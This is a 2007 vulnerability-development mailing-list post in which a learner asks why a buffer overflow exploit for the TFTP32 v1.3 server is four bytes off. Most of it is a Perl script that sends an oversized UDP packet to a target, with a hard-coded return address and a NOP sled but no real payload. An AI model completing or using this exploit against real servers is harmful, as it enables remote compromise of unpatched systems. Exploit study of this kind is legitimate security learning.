Vulnerability Development mailing list archives
Help needed in TFTP32v1.3 BO
From: wong yu liang <yuliang11 () yahoo com>
Date: Tue, 16 Oct 2007 22:53:53 -0700 (PDT)
hi all, i'm new to bufferoverflow. i've gone thru some basic examples in bufferover now i'm trying to write my own exploit based on this software. basically i found this perl script somewhere on the net. it takes 264 bytes to overflow with 4 byte extra for the EIP. i''m using call esp , #0x77e2d9d3 advapi32.dll winxp sp2 for the RET and i found that i'm still 4 bytes off when i dump the esp register in ollydbg. i've some examples on the net like "add esp 10, ret 4" , but i'm not sure what it means. help someone can enlighten me on this. thanks use IO::Socket; $host = "10.10.10.2";#Target IP here $port = "69";#Target Port Here. TFTP uses udp 69 #0x77e2d9d3 advapi32.dll $shellcode="\xd3\xd9\xe2\x77"; $shellcode.="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";#NOPS $shellcode.="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";#NOPS $shellcode.="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";#NOPS $shellcode.="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";#NOPS $shellcode.="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";#NOPS $shellcode.="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";#NOPS $shellcode.="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";#NOPS $shellcode.="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";#NOPS $shellcode.="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";#NOPS $shellcode.="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";#NOPS 136 $buf ="\x00\x02"; $buf .= "\x41" x 264; $buf .= $shellcode; #Print size of buffer print "Length: ", length($buf), "\n"; #Try to create socket $socket = IO::Socket::INET->new(Proto => "udp") or die "Cannot Create Socket: $@\n"; $ipaddr = inet_aton($host) || $host; $portaddr = sockaddr_in($port, $ipaddr); #Send our evil buffer send($socket, $buf, 0, $portaddr) == length($buf) or die "Cannot Send Buffer: $!\n"; print "All Done\n"; ____________________________________________________________________________________ Be a better Heartthrob. Get better relationship answers from someone who knows. Yahoo! Answers - Check it out. http://answers.yahoo.com/dir/?link=list&sid=396545433
Current thread:
- Help needed in TFTP32v1.3 BO wong yu liang (Oct 17)
- <Possible follow-ups>
- Re: Help needed in TFTP32v1.3 BO wong yu liang (Oct 23)